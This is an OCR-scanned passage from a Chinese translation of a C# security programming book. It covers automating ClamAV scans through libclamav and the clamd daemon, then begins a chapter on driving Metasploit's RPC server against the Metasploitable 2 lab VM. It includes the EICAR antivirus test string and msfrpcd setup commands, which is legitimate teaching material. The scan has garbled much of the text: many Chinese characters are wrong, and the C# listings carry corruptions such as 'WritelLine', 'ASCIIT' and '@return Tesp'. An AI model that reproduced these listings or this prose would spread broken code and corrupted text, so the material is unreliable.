Console.Error.WritelLine("Freeing allocated engine failed"); 
} 


i 


我 们 实现 Dispose () 方法 的 原因 是 ， 如 果 用 完 之 后 不 把 ClamAV 软 件 引 擎 释 放 ， 那 么 将 造成 内 存 泄露 。 通 过 C# 这 类 语言 来 
调用 C 语 言 库 有 一 个 缺 护 ， 因 为 C# 语 言 也 有 垃圾 回收 机 制 ， 所 以 很 多 程序 员 事 后 不 会 主动 考虑 清理 工作 。 然 而 ，C 语 言 并 没有 垃 
圾 回收 机 制 ; 如 果 在 C 语 言 中 分 配 了 一 块 内 存 ， 在 用 完 之 后 我 们 需要 释放 它 。 这 就 是 cl_engine free () 消 数 @ 所 做 的 工作 。 仔 
细 一 后 的 做 法 是 ， 我 们 还 要 通过 比较 返回 值 和 CL_SUCCESS 是 否 相 等 ， 来 确定 成 功 释放 了 3 引 | 掌 。 如 果 相等 ， 则 一 切 正常 ， 否则， 
将 抛 出 一 个 异常 ， 因 为 我 们 应 该 能 够 释放 我 们 所 分 配 的 引擎 空间 ， 而 如 果 不 能 释放 ， 则 可 能 说 明代 码 中 存在 错误 。 


10.3.6 ”通过 扫 拉 EICAR 测 坯 文件 来 测试 程序 


现在 ， 我 们 可 以 将 代码 整合 ， 并 通过 扫描 实例 来 对 我 们 的 扩展 进行 检验 。EICAR 文 件 是 一 个 业界 认可 的 文本 文件 ， 补 用 于 测 
试 肥 病毒 产品 ; 它 是 无 害 的 ,但 任何 功能 完备 的 有 反 病 毒 产 品 都 会 将 其 识别 为 一 个 病毒 ， 因 此 我 们 将 用 它 来 测试 我 们 的 程序 。 清 
10-11 使 用 Unix 系 统 的 cat 命 令 来 打印 特别 用 于 测试 反 病 毒 功能 的 测试 文件 ( 即 EICAR 文 件 ) 的 内 容 。 


清单 10-11: 打印 EICAR 反 病毒 测试 文件 的 内 容 


$ cat ~/eicar.com.txt 
X50!1P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* 


清单 10-12 中 简短 的 程序 将 扫 摘 参数 指定 的 任何 文件 并 打印 结果 。 
清单 10-12: 程序 中 的 Main () 方法 自动 运行 ClamAV 软 件 
public static void Main(string[|] args) 


using (@ClamEngine e = new ClamEngine()) 


foreach (string file in args) 
ClamResult result = e.@ScanFile(file); //pretty simple! 


if (result != null && result.ReturnCode == ClamReturnCode.®@CL VIRUS ) 
Console.WriteLine("Found: ”+ result.VirusName); 
else 
Console.WriteLine("File Clean!"); 
} 


} //engine is disposed of here and the allocated engine freed automatically 


} 


在 Main () 方法 开头 ， 我 们 在 using 语 句 环境 下 创建 ClamEngine 类 @@， 因 此 在 程序 执行 完毕 时 引擎 将 被 自动 清理 。 之 后 ， 
循环 处 理 传递 给 Main () 方法 的 每 一 个 参数 ， 并 假设 它 是 能 够 使 用 ClamAV 软 件 扫 摘 的 文件 路 径 。 我 们 将 每 个 文件 路 径 传递 给 
ScanFile () 方法 @,， 之 后 检查 ScanFile () 方法 所 返回 的 结果 ， 查 看 ClamAV 软 件 的 返回 值 是 否 等 于 CL_VIRUS@)。 如 果 是 ， 
则 在 屏幕 上 打印 病毒 名 称 ， 如 清单 10-13 所 示 ; 否则 ， 打 印 提示 信息 “File Clean! “ 


清单 10-13: 对 EICAR 文 件 运行 我 们 的 ClamAV 程 序 ， 得 到 病毒 标识 


$ mono ./ch10 automating clamav fs.exe “~/eicar.com.txt 
@ Found: Eicar-Test-Signature 


如 果 程 序 打 印 “Found: Eicar-Test-Signatrue”， 则 通过 检验 ! 这 意味 着 ClamAV 软 件 扫描 EICAR 文 件 ， 将 它 与 数据 库 中 
的 EICAR 定 义 相 匹配 ， 并 返回 病毒 名 称 。 本 程序 一 个 很 棒 的 扩展 练习 是 ， 使 用 FileWatcher 类 来 对 文件 夹 设 定 变化 监控 ， 然 后 自 
动 扫 摘 在 这 些 文件 夹 中 改变 或 创建 的 文件 。 


现在 我 们 拥有 一 个 有 效 程 序 能 够 使 用 ClamAV 软 件 扫 拉 文件。 然而 在 某 些 情况 下 ， 由 于 许可 〈ClamAV 软 件 由 GNU 公 共 许 可 
证 授权 ) 或 技术 原因 无 法 将 应 用 程序 与 ClamAV 软 件 有 效 整 合 到 一 起 ， 但 你 仍 需 要 企 网 络 中 扫 摘 文 件 友 现 病 毒 的 途径 。 我 们 将 讨 
论 另 一 种 目 动 运行 ClamAV 软 件 的 万 法 ， 这 种 方法 能 够 以 一 种 更 集中 的 方式 来 解决 这 个 问题 。 


10.4 通过 clamd 守 护 进 程 自动 化 执行 


clamd 守 护 进 程 为 能 够 接受 用 户 或 其 他 类 似 方 上 传 文件 的 应 用 程序 添加 病毒 扫 摘 功能 提供 了 一 种 很 好 的 方式 。 它 在 TCP 协 议 
层 执行 操作 ， 但 默认 不 使 用 SSL 安 全 协议 进行 保护 ! 它 是 轻 量 级 的 ， 但 要 求 必 须 在 网 络 中 的 服务 器 上 运行 ， 这 个 条 件 会 市 来 一 些 
限制 。clamd 服 务 可 以 运行 一 个 常 驻 进 程 来 扫描 文件 ， 而 不 需要 像 10.3 节 中 的 目 动 化 流程 那样 ， 管 理 分 配 ClamAV 软 件 引 党 。 
为 它 是 ClamAV 软 件 的 服务 器 版 本 ， 所 以 你 甚至 可 以 使 用 clamd 守 护 进 程 为 那些 未 安装 该 应 用 程序 的 主机 扫描 文件 。 正 如 之 前 所 
讨论 的 ， 当 你 只 想 在 一 处 管理 病毒 定义 ， 或 者 你 的 守 源 受 限 而 想 要 人 在 另 一 台 主 机 上 离线 进行 病毒 扫 摘 时 ， 这 种 扩 术 融 显 得 很 方 
便 。 使 用 C#i 语 言 实现 clamd 守 护 进 程 目 动 化 执行 很 简单 ， 只 需要 两 个 很 小 的 类 : 一 个 会 话 和 一 个 管理 器 。 


10.4.1 安装 clamd 守 护 进 程 


在 大 部 分 平台 上 ， 通 过 软件 包 管 理 器 安装 ClamAV 软 件 并 不 会 安装 Clamd 守 护 进 程 。 比 如 在 Ubuntu 系统 上 ， 你 需要 单独 使 
用 apt 工 具 安 妆 clamav-daemon 软 件 包 ， 具 体 命 令 如 下 所 示 : 


$ sudo apt-get install clamav-daemon 


在 Red Hat 系 统 或 者 Fedora 系 统 上 ， 你 需要 使 用 一 个 稍微 不 同 的 软件 包 名 称 来 进行 安 委 : 


$ sudo yum install clamav-server 


10.4.2 ”局 动 clamd 守 护 进 程 
在 安装 守护 进程 之 后 为 了 使 用 clamd， 你 需要 局 动 守护 进程 ， 它 默认 在 闹 口 3310 和 地 址 127.0.0.1 进 行 监听 。 你 可 以 使 用 
clamd 命 令 进行 该 操作 ， 如 清单 10-14 所 示 。 
清单 10-14: 启动 clamd 守 护 进 程 
$ clamd 
注意 : 如 果 使 用 软件 包 管 理 器 来 安装 clamd， 那 么 它 可 能 默认 配置 为 监听 本 地 UNIX 套 接 字 而 不 是 网 络 接 口 。 如 果 在 使 用 TCP 
套 接 字 链接 clamd 守 护 进程 过 程 中 出 现 问题 ， 确 认 一 下 clamd 的 配置 是 否 为 监听 网 络 接 口 ! 


在 运行 该 命令 时 你 可 能 没有 收 到 任何 反馈 信息 。 没 有 消息 丈 是 好 消息 ! 如 果 clamd 局 动 过 程 中 没有 任何 提示 信息 ， 说 明 它 已 
经 成 功 局 动 。 可 以 通过 使 用 netcat 工 具 连 接 监 听 端 口 ， 并 且 当 我 们 在 端口 上 手动 执行 命令 (比如 获取 当前 clamd 版 本 ， 以 及 扫 摘 
文件 ， 如 清单 10-15 所 示 ) 时 观察 所 友 生 的 事件 ， 来 测试 clamd 是 否 正 确 运行 。 


清单 10-15: 通过 netcat TCP 工 具 使 用 clamd 运 行 简 单 的 命令 


$ echo VERSION | nc -v 127.0.0.1 3310 

ClamAV 0.99/20563/Thuyu Jun 11 15:05:30 2015 

$ echo "SCAN /tmp/eicar.com.txt” | nc -v 127.0.0.1 3310 
/tmp/eicar.com.txt: Eicar-Test-Signature FOUND 


连接 clamd 并 友 送 VERSION 命 令 将 打 EjClamAV 软 件 版 本 。 你 还 可 以 友 送 市 有 一 个 文件 路 径 作 为 参数 的 SCAN 命 令 ， 将 返回 
扫 摘 结果 。 通 过 编写 代码 可 以 轻松 将 该 操作 变 成 目 动 执行 。 


10.4.3 创建 clamd 进 程 会 话 类 


几乎 不 需要 对 Clamdsession 类 中 代码 的 工作 机 制 进行 任何 的 深入 研究 ， 因 为 它 太 简单 了 。 我 们 创建 了 一 些 属性 来 保存 


clamd 运 行 的 主机 和 端口 ， 一 个 Execute () 方法 来 接受 并 执行 camd () 命令 ,以 及 一 个 TCPClient 类 来 创建 一 个 用 于 写 入 命 
令 的 TCP 数 据 流 ， 如 清单 10-16 所 示 。 人 在 第 4 章 构建 定制 载荷 时 ， 我 们 和 下 次 引入 TCPClient 类 ; 在 第 7 章 目 动 运行 OpenVAs 漏 洞 扫 
描 器 时 ， 我 们 再 次 用 到 了 它 。 


清单 10-16: 创建 新 clamd 会 话 的 类 


public class ClamdSession 


L 
private string host = null; 
private int port; 
public @ClamdSession(string host, int port) 
{ 
host = host,; 
_port = port; 
} 
public string @Execute(string command) 
L 
string resp = string.Empty; 
using (@TcpClient client = new TcpClient( host, port)) 
{ 
using (NetworkStream stream = client.@GetStream()) 
byte[] data = System.Text.Encoding.ASCIIT.GetBytes (command); 
stream. @Write(data, 0, data.Length); 
@using (StreamReader rdr = new StreamReader(stream)) 
resp = rdr.ReadToEnd(); 
} 
} 
@return Tesp 
} 
} 


ClamdSession 构 造 器 @ 有 两 个 参数 (要 连接 的 主机 和 端口 ) ， 之 后 使 用 这 两 个 参数 为 类 的 本 地 变量 赋值 ，Execute () 方 
法 随后 将 用 到 这 两 个 变量 。 之 前 我 们 所 有 的 会 话 类 都 实现 了 IDisposable 接 口 ， 但 是 在 Clamdsession 类 中 我 们 不 需要 这 么 做 。 执 
行 完 毕 时 我 们 不 需要 清理 任何 东西 ， 因 为 clamd 是 一 个 运行 于 端口 之 上 的 守护 进程 和 持续 不 断 运 行 的 后 台 进 程 ， 所 以 为 我 们 省 了 
不 少 麻烦 。 


Execute () 方法 @ 只 有 一 个 参数 : 要 运行 于 clamd 实 例 的 命令 。ClamdManager 类 中 只 实现 了 可 用 clamd 命 令 的 一 部 分 ， 
因此 你 会 发 现 ， 研 究 clamd 的 协议 命令 有 助 于 查看 还 有 哪些 有 用 的 命令 可 用 于 自动 执行 。 要 让 命令 执行 并 开始 读 取 clamd 的 反馈 
言 息 ， 首 先 将 主机 和 洱 口 传递 给 TCPClient 类 的 构造 器 作为 参数 ， 来 创建 一 个 新 的 TCPClient 类 @)。 然 后 为 了 写 入 命令 ,调用 
Getstream () 水 数 @ 来 连接 clamd 实 例 。 使 用 Write () 方法 @ 将 命令 写 入 流 中 ， 之 后 创建 一 个 新 的 StreamReader 类 来 读 取 
反馈 @O。 最 后 ， 将 反馈 信息 返回 给 调用 者 @。 


10.4.4 创建 camd 进 程 管理 器 类 


清单 10-17 定 义 的 Clamdsession 类 很 简单 ， 这 融 导 致 ClamdManager 类 也 很 简单 。 它 只 是 创建 了 一 个 构造 器 和 两 个 方法 来 
执行 清单 10-15 中 手动 执行 的 命令 。 


清单 10-17: clamd 的 管理 器 类 


public class ClamdManager 


人 


private ClamdSession session = null; 


public @ClamdManager(ClamdSession session) 


{ 
session = session; 
} 
public string @CGetVersion() 
{ 
return session.Execute("VERSION"); 
} 
public string @Scan(string path) 
{ 
return session.Execute("SCAN " + path); 
} 


} 


ClamdManager 类 的 构造 器 Q@ 有 一 个 参数 
法 之 后 将 用 到 该 变量 。 


用 于 执行 命令 的 会 话 ， 随 后 使 用 该 参数 为 _session 类 本 地 变量 赋值 ， 其 他 万 


我 们 创建 的 第 一 个 方法 是 GetVersion () 方法 @， 它 通过 将 字符 串 VERSION 传 递 给 clamd 会 话 类 中 所 定义 的 Execute () 
方法 来 执行 clamd 的 VERSION 命 令 ; 该 命令 将 版 本 信息 返回 给 调用 者 。 第 二 个 方法 是 Scan () @， 它 将 一 个 文件 路 径 作为 参 
数 ， 与 amd 的 SCAN 命 令 一 起 传递 给 Execute () 方法 。 现 在 既 有 会 话 类 也 有 管理 器 类 ， 我 们 可 以 将 两 者 整合 到 一 起 。 


10.4.5 测试 clamd 进 程 


整合 工作 只 需要 Main () 方法 中 的 几 行 代码 ， 如 清单 10-18 所 示 。 
清单 10-18: 自动 运行 clamd 的 Main () 方法 


public static void Main(string[] args ) 


{ 


ClamdSession session = new @ClamdSession("127.0.0.1", 3310); 
ClamdManager manager = new ClamdManager(session); 


Console.WriteLine(manager.@GetVersion()); 


@foreach (string path in args) 
Console.WriteLine(manager.Scan(path)); 
} 


我 们 将 127.0.0.1 作 为 连接 主机 ， 并 将 3310 作 为 主机 并 口传 递 给 构造 器 ClamdSession () @， 来 创建 ClamdSession 类 。 之 
后 ,我 们 将 新 创建 的 ClamdSession 类 传递 给 ClamdManager 类 构造 器 。 通 过 一 个 新 创建 的 ClamdManager 类 ， 来 打 Fjclamd 


实例 的 版 本 @; 然后 所 历 @ 传 递 给 程序 的 每 一 个 参数 ， 冯 试 扫 摘 文件 ， 并 为 用 户 在 屏幕 上 打印 结果 。 在 本 例 中 ， 我 们 只 测试 一 个 
文件 ， 即 EICAR 测 试 文件 。 然 而 ， 你 可 以 在 命令 行 解释 器 允许 的 情况 下 扫 摘 任意 数量 的 文件 。 


待 扫描 的 文件 需要 位 于 运行 camd 守 护 进 程 的 服务 器 上 ， 因 此 为 了 跨越 网 络 完成 扫描 工作 ， 你 需要 一 种 途径 来 将 文件 发 送 到 
服务 器 的 某 个 位 置 ， 以 便 clamd 进 程 能 够 读 取 ; 可 以 通过 远程 网 络 共 享 或 者 其 他 途径 来 将 文件 上 传 到 服务 器 。 在 本 例 中 ，clamd 
在 127.0.0.1 (localhost) 进行 监听 ， 并 且 它 可 以 访问 我 的 Mac 主 机 的 主 目录 进行 扫描 ， 如 清单 10-19 所 示 。 


清单 10-19: clamd 自 动 运行 程序 扫描 硬 编码 EICAR 文 件 


$ ./ch10 automating clamav clamd.exe “~/eicar.com.txt 
ClamAV 0.99/20563/Thu Jun 11 15:05:30 2015 
/Users/bperry/eicar.com.txt: Eicar-Test-Signature FOUND 


你 可 能 注意 到 了 ， 使 用 clamd 自 动 运行 比 使 用 libclamav 库 要 快 得 多 。 这 是 因为 libclamav 库 程序 伦 了 大 量 时 间 用 于 分 配 和 编 
译 引 警 ， 而 不 是 真正 扫描 我 们 的 文件 。clamd 守 护 进程 只 在 启动 时 分 配 一 次 引擎 ; 因此 ， 当 我 们 提交 待 扫 拉 文件 时 ， 会 快速 收 到 
结果 。 我 们 可 以 使 用 time 命 令 运 行 应 用 程序 来 测试 ， 访 命令 将 打印 应 用 程序 运行 所 耗费 的 时 间 ， 如 清单 10-20 所 示 。 


清单 10-20: ClamAV 和 clamd 应 用 程序 扫描 相同 的 文件 所 耗费 的 时 间 比较 


$ time ./ch10 automating clamav fs.exe “~/eicar.com.txt 
Found: Eicar-Test-Signature 


real @0m11.8725s 

User Om11.508s 

sys Om0.254s 

$ time ./ch10 automating clamav clamd.exe ~/eicar .com.txt 
ClamAV 0.99/20563/Thu Jun 11 15:05:30 2015 
/Users/bperry/eicar.com.txt: Eicar-Test-Signature FOUND 


real @0omo0.111s 
User 0m0.0875s 
Sys Om0.011s 


可 以 看 出 ， 第 一 个 程序 扫描 EICAR 测 试 文件 用 了 11 秒 @@， 而 使 用 clamd 的 第 二 个 程序 只 用 了 不 到 1 秒 Q@。 


10.5 ”本 童 小 结 


ClamAV 软 件 是 一 套 针对 家 庭 和 办 公用 途 的 强大 而 灵活 的 反 病 毒 解决 方案 。 在 本 章 中 ， 我 们 以 两 种 不 同 的 方式 来 运行 
ClamAV 软 件 。 


首先 ， 我 们 为 libclamav 本 地 库 实现 了 一 些小 型 附加 扩展 。 这 使 得 我 们 能 够 按照 需求 对 ClamAV3 引 | 苟 进 行 分 配 、 扫 搬 与 释 
放 ， 而 代价 是 需要 安装 一 份 libclamav 库 的 副本 ， 并 在 每 次 运行 程序 时 分 配 一 个 代价 高 昂 的 引 警 。 然 后 ， 我 们 实现 了 两 个 类 来 运 
行 远程 的 clamd 实 例 ， 从 而 获取 ClamAV 软 件 版 本 ， 以 及 在 clamd 进 程 所 在 的 服务 器 上 扫描 一 个 给 定 的 文件 路 径 。 这 种 方式 能 够 
有 效 提 高 程序 的 运行 速度 ， 但 代价 是 要 求 竺 扫描 的 文件 位 于 运行 clamd 进 程 的 服务 器 上 。 


ClamAV 是 一 家 真正 支持 开源 软件 的 大 公司 (思科 ) 给 出 的 一 个 民 好 范例， 每 个 人 都 能 从 中 受益 。 你 会 友 现 ， 通 过 扩展 这 些 
附加 程序 来 更 好 地 保护 你 的 应 用 程序 、 用 尸 和 网 络 ， 是 一 个 很 好 的 练习 项 目 。 


第 11 草 ”自动 化 运行 Metasploit 


Metasploit 平 台 实 际 上 是 一 种 开源 的 渗透 测试 框架 ; 它 使 用 Ruby 语 言 编写 ， 既 是 一 个 漏洞 数据 库 ， 也 是 一 个 用 于 漏洞 开发 
和 渗透 测试 的 框架 。 但 是 Metasploit 平 台 有 很 多 非常 有 用 的 特性 ， 比 如 它 的 远程 过 程 调用 (RPC) API 函 数 经 常 被 忽视 。 


本 章 将 为 你 介绍 Metasploit RPC， 并 展示 如 何 使 用 它 来 编程 驱动 Metasploit 框 架 。 你 将 学 习 如 何 使 用 RPC 来 自动 运行 
Metasploit 平 台 ， 进 而 对 Metasploitable 2 系统 (一 台 故 意 设置 漏洞 的 Linux 系 统 主机 ， 被 设计 用 于 学 习 如 何 使 用 Metasploit 平 
台 ) 进行 漏洞 利用 。 攻 击 方 或 攻击 安全 专业 人 员 应 该 注意 到 ， 自 动 完成 很 多 烦琐 的 工作 可 以 节省 时 间 ， 从 而 更 多 地 天 注 那些 复杂 
隐蔽 的 漏洞 。 通 过 便捷 的 API 函 数 驱动 的 Metasploit 框 架 ， 你 能 够 以 一 种 灵活 的 方式 自动 运行 那些 烦琐 的 任务 ， 比 如 主机 探测 其 
至 网 络 漏洞 利用 。 


11.1 运行 RPC 服 务 器 


第 4 章 已 经 安装 过 Metasploit 平 台 ， 这 里 不 再 歼 述 它 的 安装 过 程 。 清 单 11-1 所 示 的 是 运行 RPC 服 务 器 需要 输入 的 命令 。 
清单 11-1: 运行 RPC 服 务 器 
$ msfrpcd -U username -P password -9 -f 


-U 和 -P 参 数 代表 用 于 认证 RPC 的 用 户 名 和 口令 ; 你 可 以 使 用 任何 用 户 名 或 口令 ， 在 编写 C# 代 码 时 我 们 将 用 到 这 些 信任 插 
证 。 -3 参数 关闭 SSL 协 议 。 ( 目 签名 证 书 更 复杂 一 些 ， 因 此 我 们 现在 将 其 忽略 。) 最 后 ，-f 通 知 RPC 接 口 在 前 闯 运 行 ， 从 而 使 得 


RPC 进 程 更 容易 监控 。 


要 使 用 一 个 正在 运行 的 RPC 新 接口 ， 可 以 启动 一 个 新 的 终 病 ， 或 者 不 使 用 -f 选 项 来 重启 msfrpcd， 然 后 使 用 Metasploit 平 台 
的 msfrpc 客 户 吴 连接 刚 启动 的 RPC 监 听 端 ， 并 开始 调用 。 需 要 提前 说 明 的 是 ，msfrpc 客 户 问 用 起 来 十 分 星 问 难民 一 一 读 取 困 难 
并 且 错 误 信 息 不 够 直观 。 清 单 11-2 展 示 了 使 用 Metasploit 平 台 目 带 的 msfrpc 客 户 弄 对 msfrpcd 服 务 器 进行 身份 认证 的 过 程 。 


清单 11-2: 使 用 msfrpc 客 户 端 对 msfrpcd 服 务 器 进行 身份 认证 


$ msfrpc @-U username @-P password ©@-S @-a 127.0.0.1 
[*] The 'rpc' object holds the RPC client interface 
[*] Use rpc.call('group.command') to make RPC calls 


>> @rpc.call('auth.login', "username', 'password') 
=> {"result"=>"success", "token"=>"TEMPZYFJ3CWFxqnBt9AfjvofOeuhKbbx"} 


要 使 用 msfrpc 连 接 RPC 监 听 端 ， 我 们 需要 将 几 个 参数 传递 给 msfrpc。 为 了 认证 而 设置 于 RPC 监 听 端 的 用 户 名 和 口令 ， 分 别 
通过 -U@ 和 -PQ 参数 传递 。-S 参 数 @) 通 知 msfrpc 在 连接 监控 端 时 不 使 用 SSL 协 议 ，-a 参 数 @ 是 监听 端 所 连接 的 IP 地 址 。 因 为 我 
们 在 创建 msfrpcd 实 例 时 并 未 指定 监听 的 IP 地 址 ， 所 以 使 用 默认 地 址 127.0.0.1。 


连接 RPC 监 听 端 之 后 ， 我 们 就 可 以 使 用 rpc.call () 函数 @ 来 调用 可 用 的 API 方 法 。 我 们 将 使 用 auth.login 远 程 过 程 方法 来 测 
试 ， 因 为 它 用 到 了 与 传递 参数 相同 的 用 户 名 和 口令 。 当 你 调用 rpc.call () 水 数 时 ，RPC 方 法 和 参数 将 以 序列 化 MSGPACK 二 进 
制 区 块 的 形式 打包 ， 并 使 用 内 容 类 型 为 binary/message-pack 的 HTTP 投 递 请 求 发 送 到 RPC 服 务 器 端 。 这 点 很 值得 关注 ， 因 为 我 
们 需要 用 C# 语 言 以 同样 的 方式 与 RPC 服 务 器 通信 。 


我 们 对 于 使 用 HTTP 库 已 经 有 了 很 丰富 的 经 验 ， 但 是 MSGPACK 序 列 化 与 传统 的 HTTP 序 列 化 格式 (你 肯定 更 倾向 于 XML 或 
者 JSON) 有 很 大 不 同 。C#i 语 言 可 以 使 用 MSGPACK 库 非常 高 效 地 读 取 并 响应 来 自 Ruby 语 言 编写 的 RPC 服 务 器 的 复杂 数据 ， 正 
如 使 用 JSON 或 XML 能 够 为 两 种 语言 提供 可 能 的 桥梁 进行 通信 。 当 我 们 使 用 MSGPACK 库 进行 操作 时 ，MSGPACK 序 列 化 的 机 制 
原理 会 变 得 更 加 清晰 。 


11.2” 安 沪 Metasploitable 系 统 


Metasploitable 2 系统 有 一 个 特定 的 漏洞 利用 起 来 很 简单 ， 即 一 个 存在 后 门 的 虚拟 IRC 服 务 器 。 这 是 一 个 很 典型 的 使 用 
Metasploit 模 块 进行 利用 的 漏洞 示例 ， 我 们 可 以 通过 它 来 学 习 使 用 Metasploit RPC。 你 可 以 从 Rapid7 网 站 
(https://information.rapid7.com/metasploitable-download.html) 或 者 VulnHub 网 站 (https://www.vulnhub.com/) 下 
载 Metasploitable 2 系统 。 


Metasploitable 系 统 使 用 VM DK 镜像 格式 存储 于 ZIP 压 缩 包 中 ， 因 此 在 VirtualBox 软 件 上 不 能 直接 安装 。 在 解压 
Metasploitable 虚 拟 机 并 打开 VirtualBox 软 件 之 后， 按照 如 下 步骤 进行 安 委 : 


2. 创 建 一 台 名 为 “Metasploitable” 的 新 虚拟 机 。 


3. 设 置 虚 拟 机 的 操作 系统 为 Linux 系 统 ， 版 本 为 Ubuntu (64 位 ) ; 然后 点 击 continue (继续 ) 或 Next (下 一 步 ) 按钮 。 
4. 将 虚拟 机 的 内 存 大 小 设置 为 512MB 到 1GB 之 间 ， 然 后 点 击 continue (继续 ) 或 Next (下 一 步 ) 按钮 。 


5. 在 硬盘 设置 对 话 框 中 ， 选 择 Using an existing virtual hard disk file (使 用 一 个 已 存在 的 虚拟 硬盘 文件 ) 选项 。 
6. 硬 盘 下 拉 框 旁边 是 一 个 小 的 文件 夹 按钮 ; 点 击 该 按钮 ， 并 找到 解压 后 的 Meta-sploitable 系 统 所 在 的 文件 夹 。 

7. 选 择 Metasploitable 系 统 的 VMDK 文 件 ， 并 点 击 对 话 框 右边 的 Open (打开 ) 按钮 。 

8. 在 硬件 对 话 框 中 点 击 Create (创建 ) 按钮 ， 这 个 操作 将 天 闭 虚 拟 机 安 沪 向导。 

9. 通 过 点 击 VirtualBox 软 件 窗口 最 上 方 的 Start (开始 ) 按钮 ， 开 局 新 虚拟 机 。 


虚拟 应 用 启动 之 后 ， 我 们 需要 它 的 IP 地 址 ， 为 了 获取 IP， 在 应 用 局 动 之 后 我 们 要 以 msfadmin/msfadmin 的 身份 登录 ， 然 后 
在 bash 命 令 行 中 输入 ifconfig 命 令 ， 将 IP 配 置 打 印 到 屏 磊 上 。 


11.3 ”获取 MSGPACK 库 


在 开始 使 用 C# 语 言 编 写 代 码 驱 动 Metasploit 实 例 之 前 ， 还 需要 MSGPACK 库 。 这 个 库 并 不 是 C# 核 心 库 的 一 部 分 ， 因 此 我 们 
必须 使 用 NuGet 工 具 (.NET 平 台 的 软件 包 管 理 器 ， 类 似 于 Python 语言 的 pip 工 具 或 Ruby 语 言 的 gem 工 具 ) 来 安装 我 们 要 用 到 的 
库 。 默 认 情 况 下 ，Visual Studio 和 Xamarin Studio 开 友 环 境 都 支持 使 用 NuGet 进 行 软件 包 管理 ; 然而，Linux 系 统 友 行 版 上 免 
费 可 用 的 MonoDevelop 开 上 环境 ， 并 不 像 其 他 集成 开 上 友 环 境 那 样 ， 具 有 最 新 的 NuGet 特 性 。 让 我 们 了 解 一 下 在 MonoDevelop 
开发 环境 下 如 何 安装 正确 的 MSGPACK 库 。 这 有 一 点 儿 绕 弯 ， 而 使 用 Xamarin studio 和 Visual studio 开发 环境 会 简单 得 多 ， 
为 它们 不 要 求 安装 指定 版 本 的 MSGPACK 库 。 


11.3.1 为 MonoDevelop 环 境 安 装 NuGet 软 件 包 管 理 器 


首先 ， 要 使 用 MonoDevelop 开 发 环境 中 的 插件 管理 器 来 安装 NuGet 插 件 。 如 果 需 要 这 样 做 ， 请 打开 MonoDevelop 开 发 环 
境 ， 然 后 按照 如 下 步骤 来 安装 NuGet 软 件 包 管理 器 : 


1. 找 到 Tools (工具 ) 一 Add-in Manager (插件 管理 器 ) 菜单 项 。 


5. 在 Add New Repository (添加 新 储存 库 ) 对 话 框 中 ， 勾 选 Register an on-linerepository (注册 一 个 在 线 储 存 库 ) 选 
项 。 在 URL 文 本 框 中 ， 输 入 如 下 URL 地 址 : http://mrward.github.com/monodevelop-nuget-addin- 


repository/4.0/main.mrep., 


使 用 已 安 妆 的 新 储 仔 库 ， 你 可 以 很 方便 地 安 疼 NuGet 软 件 包 管理 器 。 在 天 闭 储 仓库 对 话 框 乙 后 ， 我 们 将 回 到 插件 管理 器 的 
Gallery ( 库 ) 标签 中 。 在 插件 管理 器 的 右上 角 是 一 个 文本 框 ， 用 于 搜索 可 安装 的 插件 。 在 该 文本 框 中 输入 nuget， 它 将 过 渡 软 
件 包 并 显示 出 NuGet 软 件 包 。 选 择 NuGet 扩 展 程序 ， 然 后 点 击 Install ( 安 半 ) 按钮 (如 图 11-1 所 示 ) 。 


Add-in Manager 


盖 Iinstalled | 食 updates | 鸭 callery (1) 
Repository: | Allrepositories :I€ | NuGetPackage Management 


: Version 0.9 
vv IDE extensions Download size: 0.56 MB 


NuGet Package Management Available in repository: 
Provides support for adding and maintaining NuGet packages in your proje... mrward.github.com 


Provides support for adding and 
maintaining NuGet packages in your 
project. Updated to use NuGet 2.8.1 


会 More infFormation 


| 蕊 Install... | 


| Install from file... 


图 11-1 使 用 MonoDevelop 开 发 环境 的 插件 管理 器 安装 NuGet 工 具 


11.3.2” 安 沪 MSGPACK 库 


现在 NuGet 软 件 包 管理 器 已 经 成 功 安装 ,我 们 可 以 安 容 MSGPACK 库 了 。 这 有 点 儿 及 烦 。 为 MonoDevelop 开 友 环 境 安 六 的 
MSGPACK 库 最 好 选择 0.6.8 版 本 (出 于 兼容 性 方面 的 考虑 ) ， 但 MonoDevelop 开 发 环境 中 的 NuGet 管 理 器 不 允许 指定 版 本 ， 而 
总 是 尝试 安装 最 新 版 本 。 我 们 需要 向 工程 手动 添加 文件 packages.config， 来 指定 我 们 所 需要 的 库 版 本 ， 如 清单 11-3 所 示 。 在 
MonoDevelop、Xamarin Studio 或 Visual Studio 开发 环境 的 解决 方案 浏览 器 中 ， 右 键 点 击 Metasploit 工 程 ; 在 出 现 的 菜单 
中 ,选择 “添加 (Add) 一 新 文件 (New File) ”来 添加 一 个 名 为 packages.config 的 文件 。 


清单 11-3: 文件 packages.config 指 定 了 MsgPack.Cli 库 的 正确 版 本 


<?xml] version="1.0" encoding= Utf-8 ?> 
<packages> 

<package ld= MsgPack.CLi version="0.6.8" targetFramework="net45” /> 
</packages> 


在 创建 文件 packages.config 之 后 ， 重 局 MonoDevelop 开 上 友 环 境 ， 并 打开 你 所 创建 的 工程 ， 来 运行 马上 要 编写 的 
Metasploit 代 码 。 现 在 可 以 右键 点 击 工程 引用 ， 并 点 击 “Restore NuGet Package (还 原 NuGet 软 件 包 ) ”菜单 项 ， 使 文件 
packages.config 中 的 软件 包 以 正确 的 版 本 安装 。 


11.3.3 引用 MSGPACK 库 


安装 了 正确 版 本 的 MSGPACK 库 之 后 ， 我 们 就 可 以 将 其 添加 为 工程 引用 ， 从 而 开始 编写 一 部 分 代码 。 通 常 来 说 NuGet 工 具 
会 为 我 们 处 理 这 部 分 内 容 ， 但 在 MonoDevelop 开 友 环 境 中 这 方面 稍 有 瑕 姜 ， 我 们 必须 人 工 处 理 一 下 。 石 键 点 击 MonoDevelop 


开 友 环境 解决 方案 子 窗口 中 的 References (引用 ) 文件 夹 ， 选 择 Edit Reference (编辑 引用 ) ， 如 图 11-2 所 示 。 


solution 


metasploit 
vO metasploit 
bp | ReFerences 
Edit References... 


Manage NuGet Packages... 
Restore NuGet Packages 


Refresh 


图 11-2 ”解决 方案 子 窗口 中 的 “Edit References 菜单 项 


编辑 引用 对 话 框 中 将 显示 一 些 可 用 标签 ， 如 图 11-3 所 示 。 你 需要 选择 .Net Assembly (.Net 程 序 集 ) 标签 ， 然 后 在 工程 的 根 
目录 下 的 packages (软件 包 ) 文件 夹 中 找到 MsgPack.dll 程 序 集 。 这 个 packages (软件 包 ) 文件 夹 是 由 NuGet 工 具 在 下 载 
MSGPACK 库 时 自动 创建 的 。 


Edit References 
